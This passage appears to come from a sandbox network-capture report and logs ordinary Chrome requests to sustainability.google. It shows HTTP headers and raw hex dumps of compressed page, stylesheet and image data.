                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a
                                                                                                                                                                                                                                                                                          Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff
                                                                                                                                                                                                                                                                                          Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC1390INData Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: BBBBBBF!4I
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC575INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: $'


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          123192.168.2.749956216.239.36.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC733OUTGET /?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content= HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC707INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: e7858ae89750d62593bb828b1130af92
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:37:13 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:47:13 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 275
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC701INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 66 66 38 0d 0a 02 ff ec bd 59 73 e3 48 96 26 fa de bf 02 c3 b2 ee cc b4 12 04 ee 14 23 a5 a8 89 8c 25 2b ab 2b 17 8b 88 aa 9c be 6d 6d 32 10 00 49 84 40 82 05 90 52 30 ba db ac 7e 44 cf c3 98 cd 3c 8f b5 d9 bc dc a7 bb d9 7d b9 fd 5e 3f a2 7e c9 fd ce 71 77 6c 74 80 90 44 4a 54 24 7b c9 a0 48 2c ee c7 dd cf fa 9d 73 ce ff d3 ab 1f 5f be ff 87 9f 5e 1b d3 e5 2c 78 fe 37 e7 f4 8f 11 d8 f3 c9 45 c3 9b 37 9e ff 8d 61 9c 4f 3d db a5 0f f8 38
                                                                                                                                                                                                                                                                                          Data Ascii: 00000001000000010000000100000001000000010000000100000001000000010000ff8YsH&#%++mm2I@R0~D<}^?~qwltDJT${H,s_^,x7E7aO=8
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 5f 2e bd e8 99 63 47 6e e6 0d f1 6a 86 e9 ae 2f 03 3b 9a 78 97 82 42 59 5e 98 bf 99 57 29 65 7a ff 59 90 3c 37 c2 fc 0d fb 3c 71 f9 37 1d fe 91 0b fc f9 95 31 8d bc f1 45 43 ed bc 92 1d 6c 44 5e 70 d1 70 ec 79 38 f7 71 b0 14 7d f9 01 fc 93 0f b9 d3 30 e8 14 5d 34 78 cd ac c5 7c d2 30 62 ff 93 17 5f 34 fa dd 8f fd 6e a3 f0 aa 31 24 55 9c db e6 d8 d3 16 38 80 bb 72 96 90 34 61 6c 89 d5 bc 8c 3d 3b 72 a6 97 e0 fd 73 d7 ba 3e b3 70 3a cd 7e d7 5d 58 74 d5 a5 e6 a2 4b 88 84 30 ba 6c 7d bc c4 a5 97 74 e9 29 0d 47 6e a3 ba a3 ee b4 3f 76 da bb 1d 75 a7 5d 7b d4 74 a9 7e d4 f1 14 92 de 59 2d 0d 41 f4 fc 02 3e 2e 55 b5 63 61 2e 68 2f fc 98 79 99 13 c7 bf 19 db 33 3f 58 5f bc 0d 47 e1 32 7c d6 6a 36 4f 3a f8 ff 2e fe 1f ec e5 64 d0 6c fe cb b7 7c d3 af df d9 f3 f8
                                                                                                                                                                                                                                                                                          Data Ascii: _.cGnj/;xBY^W)ezY<7<q71EClD^ppy8q}0]4x|0b_4n1$U8r4al=;rs>p:~]XtK0l}t)Gn?vu]{t~Y-A>.Uca.h/y3?X_G2|j6O:.dl|
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: aa f0 45 ee cf fc 1f 65 6b af 67 b3 b0 9f af 96 e1 22 cf 80 05 6b 31 3e c4 66 8e f3 e3 09 a6 bc 3e 43 95 27 c1 97 c5 fe d9 58 a6 23 33 28 13 89 c9 de 3c 32 03 08 86 94 19 e4 cf 3d b8 ce 1e 0f 39 98 57 d9 61 4e 96 2d 7f 70 93 af 4d 96 65 38 b0 99 83 ca 5c 09 52 4a 2f ff 20 fa 4c 62 11 38 f4 f2 8c 43 0a 5d 17 6e 27 de 1d 94 dc 1f 2f 37 2e c6 e5 81 af bd 1c 6e df 99 e6 72 dc 50 22 9e 33 92 d9 9b 2d 42 28 4b e4 a8 85 d6 8f 50 86 bb b2 83 18 e2 5a 49 d1 7b 0b e4 ad 6f d8 91 9c 36 8c d7 c9 5c 10 36 4a e6 a2 91 11 a0 8c 15 f8 1a 71 b2 07 02 23 36 73 45 d4 85 36 ea 41 e9 8c 76 49 da 8a 67 ef 8c a8 3f 8b f1 c3 1a 11 e3 d7 92 b3 7a 2b e7 8f 55 e0 c7 4b d3 9c 7b f1 d2 73 f3 bf b8 9e b7 d0 9e 13 c1 3f 6f bd fd f9 8c 6e 3f 02 15 54 bc f7 e6 af 78 f6 ce 56 88 a6 f9 e3
                                                                                                                                                                                                                                                                                          Data Ascii: Eekg"k1>f>C'X#3(<2=9WaN-pMe8\RJ/ Lb8C]n'/7.nrP"3-B(KPZI{o6\6Jq#6sE6AvIg?z+UK{s?on?TxV
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC686INData Raw: 94 75 8b 21 a8 9b 8b e6 42 14 a6 ef 95 6f 92 88 29 bc 46 c3 bc 89 f0 a5 53 d0 18 6e 25 e6 44 22 80 d3 85 d4 ae ee f9 42 89 3f c1 4b e5 59 69 3c ff ff fe 1d a3 e8 18 2f 20 14 69 6a c8 0e 84 7b 0c 3e 04 ec 74 3b 00 de 08 82 64 1d 9f 18 df db 1f 11 a5 4f 32 05 61 24 9f 5b 8b e2 11 d8 f6 92 6f bd f0 1b da 07 e6 ab d7 d6 37 7f ff ed 89 81 2f 5e 8a 55 d9 d1 1b 36 87 79 62 fc e1 dd ab 17 c6 1b 1b e6 d3 3b 0a fd 39 9e f1 62 e2 cd 1d c4 38 0a 13 d0 10 2e ab 58 48 7d 94 ac 8d 32 ee a1 bf dc 10 6a 85 30 5c 8a 34 cb 1f bb cc 3b 60 35 c8 3d a6 dd 3d 9a 57 b1 b2 bf f9 7c da 19 ac d1 6a cc 00 71 a2 aa 4c 88 12 08 93 d8 6e 6c 31 7c 24 fc e2 b3 4d 50 66 8a c7 94 b3 ba 99 72 da dd fe e0 74 f2 3d 4c 68 c4 e5 46 6c 36 3e ff 2d b2 50 81 10 1e 79 60 63 48 4a 4d 74 c9 c0 2b c7
                                                                                                                                                                                                                                                                                          Data Ascii: u!Bo)FSn%D"B?KYi</ ij{>t;dO2a$[o7/^U6yb;9b8.XH}2j0\4;`5==W|jqLnl1|$MPfrt=LhFl6>-Py`cHJMt+
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 3b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 30 30 30 31 0d 0a 43 0d 0a 30 30 30 30 30 30 30 31 0d 0a f2 0d 0a 30 30 30 30 30 30 30 31 0d 0a b9 0d 0a 30 30 30 30 30 30 30 31 0d 0a 59 0d 0a 30 30 30 30 30 30 30 31 0d 0a 31 0d 0a 30 30 30 30 30 30 30 31 0d 0a a4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5b 0d 0a 30 30 30 30 30 30 30 31 0d 0a df 0d 0a 30 30 30 30 30 30 30 31 0d 0a e1 0d 0a 30 31 0d 0a 90 0d 0a 30 66 66 31 0d 0a f3 db 64 76 93 76 2b d6 3c e3 62 d4 e5 32 a6 f4 70 8b f5 28 ce 46 bb 7a 59 43 17 d2 1a f1 4d e2 aa 69 3a 99 f0 6a 22 39 16 95 82 60 78 6d 7a ff 70 38 ca b8 06 e4 ae 23 70 8b 93 c8
                                                                                                                                                                                                                                                                                          Data Ascii: 00000001;0000000100000001C000000010000000100000001Y0000000110000000100000001000000010000000100000001[0000000100000001010ff1dvv+<b2p(FzYCMi:j"9`xmzp8#p
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 8f c9 98 f1 e3 39 24 0f 49 1d 14 5d 47 09 43 7a c0 d8 46 fe 24 9e 11 ce f1 46 21 60 48 b0 91 73 0c a6 38 6a fc 7a a9 03 e5 f4 3c 5e 2d 9e b7 60 e8 e1 9f 03 71 59 f5 7b a8 f6 da 6c 0a 1a 8c ec 18 14 84 df a7 bc 38 c1 ae cc 1b b8 ad d8 5f 05 f2 40 be e3 23 61 ef 4e c4 30 f2 1b 83 44 07 4c 21 e5 d3 64 cd 62 0a 6c 35 d3 18 c3 f5 44 2d 7f 46 34 c1 3e 9a 1b ed d3 a1 81 c2 bb 01 79 42 91 ea 13 f9 0e 44 cf 9c df f7 ed 6f bf 4d 97 43 ac 0f 39 e9 62 98 58 73 ac 14 2f 28 0a eb 23 55 11 ad 0a 50 f4 75 8a e7 43 55 61 77 18 06 d8 c2 56 a0 4c 1a 38 f9 68 db 42 a0 29 d5 66 01 4f d4 47 56 e4 e0 ac 2c a1 29 66 49 1e 3a 4f c0 23 c8 b9 69 1b 6b 18 55 62 5b b4 c5 b6 28 15 ed fb 75 aa 6d 54 31 5d cd 28 b1 a1 50 ea 5d f9 d7 40 0a 3d 30 f5 74 e1 22 87 48 01 43 6f 2b 52 f7 32 88
                                                                                                                                                                                                                                                                                          Data Ascii: 9$I]GCzF$F!`Hs8jz<^-`qY{l8_@#aN0DL!dbl5D-F4>yBDoMC9bXs/(#UPuCUawVL8hB)fOGV,)fI:O#ikUb[(umT1](P]@=0t"HCo+R2
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 0b 7c ff a6 a4 ac 69 bb d4 25 12 41 4b 24 58 82 52 b2 28 18 3a 0f c2 6c 4d 85 c6 6d a3 71 59 99 97 b7 49 77 3e b4 bc cc 7b 59 e4 53 e9 1c f2 f1 b9 a3 8f f5 09 f8 58 a9 0c 00 ea 67 23 86 30 23 43 a6 3a 5d 99 02 36 7b 41 c1 bf 4b 07 20 51 6c f7 11 7e 8c 17 a4 89 c1 d4 52 08 00 7a 2c b8 dd 8c 14 79 08 33 e6 38 25 71 b5 14 53 3d 87 fc 81 10 5a b0 17 52 3c 00 cd d0 d1 04 3d 36 5c d4 eb 44 83 e8 35 71 2f 29 49 55 30 90 a0 03 b8 18 22 8f f8 2b 07 97 60 95 12 4c 92 59 03 44 1e 3c be 54 bd 57 48 a7 fe a1 49 a7 6f bc 08 5b 81 98 35 72 4f e6 73 5b 90 2e 86 ac da bb 90 fa 8e d2 da 88 7f a6 44 22 9b 9a 44 15 e7 4e 51 09 4d 12 30 9c a4 4c a4 17 34 67 22 83 f9 c2 fa 02 8e 88 0d 3b 98 51 9c dc 20 d3 a6 46 a8 60 40 98 22 de 04 31 01 47 56 00 90 f2 7d 62 45 61 a0 13 20 f2
                                                                                                                                                                                                                                                                                          Data Ascii: |i%AK$XR(:lMmqYIw>{YSXg#0#C:]6{AK Ql~Rz,y38%qS=ZR<=6\D5q/)IU0"+`LYD<TWHIo[5rOs[.D"DNQM0L4g";Q F`@"1GV}bEa
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC54INData Raw: f9 44 2b c4 0a a0 57 80 3b ab 34 7e a1 60 2c fc 05 7d a9 90 f7 50 5c 08 cc 06 ff 1d 50 f8 ec 37 39 dd e3 86 13 ae 41 96 8d 73 b2 ad 51 cf 5b 6a 3f 88 84 70 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: D+W;4~`,}P\P79AsQ[j?p
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a e2 0d 0a 30 30 30 30 30 30 30 31 0d 0a f2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 0c 0d 0a 30 30 30 30 30 30 30 31 0d 0a a4 0d 0a 30 30 30 30 30 30 30 31 0d 0a a0 0d 0a 30 30 30 30 30 30 30 31 0d 0a 50 0d 0a 30 30 30 31 0d 0a 15 0d 0a 33 66 66 39 0d 0a f9 0a 7f f0 ae 6d 17 07 01 1f f3 b2 47 44 58 50 e2 61 2e 61 db 14 e9 8a 96 ab 85 f1 06 95 c2 c3 fb ee 30 78 97 46 a8 94 ac a3 43 46 c5 79 54 b6 d6 b1 86 63 cb 3e 1b 77 7b 4d 6f d4 f5 3a ad 51 d3 c6 56 1b 38 67 67 a3 e1 d0 eb 76 2d c1 87 b2 7b ed 51 4e bb 8e 88 ba b3 0e b5 23 43 5b 3d f7 92 eb 52 60 62 1a b3 fd 51 66 ba 31 8e ba db 70 e3 ba 5a ba 02 b5 cb 41 9c 1a 7a 2d 40 d2 c8 92 d9 90 fa 05 ca 17 7d 5b 1a 8f 55 a9 6f 2a bf 38 fc 66 a5 63 70 08 8f 87 51 78 5f d1 10 2d b9 0b 7a fa
                                                                                                                                                                                                                                                                                          Data Ascii: 000000010000000100000001000000010000000100000001P00013ff9mGDXPa.a0xFCFyTc>w{Mo:QV8ggv-{QN#C[=R`bQf1pZAz-@}[Uo*8fcpQx_-z
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 1d f5 c7 4e a7 d3 b1 b0 6e 9c 8a ef 5d 67 01 1d 2f 28 2d 6c 81 46 02 fc 33 16 1f 3a 25 f5 38 91 19 b7 2a 97 d9 e0 2e 2c ea 11 2a 29 5c 00 89 90 68 88 fb 28 bd 0d 11 0f 4a 3f 2e c7 00 6d d1 b8 8f 81 4e 4a 66 16 80 8c 1d 05 3a fb 23 ab 33 b2 ec 56 bf 39 6a 0f 46 5d f7 cc b6 fb e3 7e 67 ec 76 87 ad a6 3d 76 5b 43 eb 1a b8 c3 30 32 7b bf 24 af e6 2b 3f 76 08 c7 4d d0 62 0e f3 51 5f 0c 89 94 3e 0c 8b ea 1d 00 f9 54 ac 21 9b c6 c0 1c 9d f1 e2 54 76 a9 b2 0d 85 9e 3f d3 f9 23 9b f7 e1 9d 96 32 eb 82 7c 90 19 39 a4 33 4b d2 58 19 ec b3 39 10 b3 b5 33 2a f3 b8 1a d5 a0 a2 f4 cd 7a 5b a2 6a 67 a4 43 cb a7 e5 1f 52 18 6f eb 74 8f 54 15 a7 40 1e 05 2d f2 47 5c a1 d1 bd d3 5b eb cb aa cf 1c 4a e3 02 1e 3f b4 ba ed 33 b7 d3 1f b7 bb de e8 cc 76 86 2e b0 ca 67 83 be db
                                                                                                                                                                                                                                                                                          Data Ascii: Nn]g/(-lF3:%8*.,*)\h(J?.mNJf:#3V9jF]~gv=v[C02{$+?vMbQ_>T!Tv?#2|93KX93*z[jgCRotT@-G\[J?3v.g


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          124192.168.2.749957216.239.36.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC664OUTGET /static/index.min.css?cache=732a3af HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                          Referer: https://sustainability.google/?utm_source=googlehpfooter&utm_medium=housepromos&utm_campaign=bottom-footer&utm_content=
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC706INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 090e8f86491e8fc21c56e61a7f43b40b
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:32:15 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:15 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 573
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC702INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 23 0d 0a 30 30 30 66 66 31 0d 0a c9 91 28 fa 2b 3c d3 30 d0 7d cc 92 49 ea d1 6a 0a 36 8e 77 16 67 fd da 81 af 3d e7 ec c2 83 41 a3 44 96 a4 72 f3 21 93 54 3f 46 a7 2f ee 47 dc 2f bc 5f 72
                                                                                                                                                                                                                                                                                          Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001n00000001#000ff1(+<0}Ij6wg=ADr!T?F/G/_r
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 5f 5d 29 9e 91 d9 63 14 d4 43 ec 7f 2f 83 50 8f f6 d5 ea 66 4e a3 54 18 5d 6f 77 cb 6a 87 42 38 02 a9 ac 97 a3 dd ed 75 f9 72 32 a6 7f 5e 5d a9 d7 c5 ae 5c d6 0f fb 39 cc a1 e6 0c 21 68 bd 21 72 01 69 9a 57 80 2a 3f c6 9e cc 57 c6 e3 66 44 a4 25 76 db 0f a3 cd f6 c3 ae bc bf 22 f4 bc 87 38 b3 37 e5 ba 5e 7d 9a ff db 76 7b bb aa 46 7f 2d 37 fb f1 6f 77 30 81 e3 df 55 ab f7 15 4a cb 78 0f 0f 8b 7d b5 ab 6f ae 14 33 d4 3f 55 f3 e9 ae 5a ab 9f 1f 94 82 3a 9f 4c ae 58 f6 0a 21 dd 1e 28 5b 15 e5 6e fb b0 59 5e ad aa 03 08 45 81 cf 90 91 4e ce 61 e8 34 50 d1 70 27 e7 57 eb 72 77 5b 6f e6 97 40 bb 09 fc f8 c8 d2 71 7a 09 9c 7b 85 d2 c2 6d cf a0 05 fd 56 d2 f3 e6 02 7e 6a 3d 26 da b1 5c 2e b1 a3 e9 0c a0 a1 b0 5c 19 ca 89 27 95 9e 2c ab c5 76 07 9a 8e 38 63 53 a9
                                                                                                                                                                                                                                                                                          Data Ascii: _])cC/PfNT]owjB8ur2^]\9!h!riW*?WfD%v"87^}v{F-7ow0UJx}o3?UZ:LX!([nY^ENa4Pp'Wrw[o@qz{mV~j=&\.\',v8cS
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:48 UTC1408INData Raw: 45 26 1c 9a 53 1a c6 ee e1 b6 7e 59 84 9f 6d 89 f0 65 87 39 d8 bc 88 33 dd 66 1b be bc 15 08 60 fa 55 59 03 c1 af 11 9e 5e cb 92 30 5f c5 35 b8 17 28 73 56 2a e4 04 3f 7d 00 2c 13 ed 2f e4 55 a5 b0 73 e7 6b 10 57 2b ba 25 e1 07 36 79 be 86 5b e8 7c d9 19 7f d2 e5 4f be 1f 1d 99 f1 21 16 3e 11 d0 de 0a 42 9c ac 2a b0 1c b2 1d ef c0 dc 87 16 45 5f 4c 8a bd a1 7d 5d 62 dc 6f c9 04 87 60 12 3b 10 f6 04 59 b1 36 23 69 9c 0e bf d8 d9 5a b0 2f e4 66 56 c1 a3 27 98 ba 08 fe 2d 36 91 36 77 d5 70 1a f3 04 49 f8 4d 7e 6d 34 97 d2 e6 7b b3 7b 57 85 b6 2d 84 cc 6f 1b 4f 36 e1 c5 86 3f 88 1b c5 af 38 2b 36 4e c5 21 29 f1 d4 8b 94 f0 84 20 1f f4 9c c5 86 85 72 5c db 27 ec fe e9 16 10 4f 88 74 57 9a 89 af 9a e9 f5 3f d9 2e aa 49 92 00 4e 5f 42 97 09 1a 0d 43 36 7a 32 15
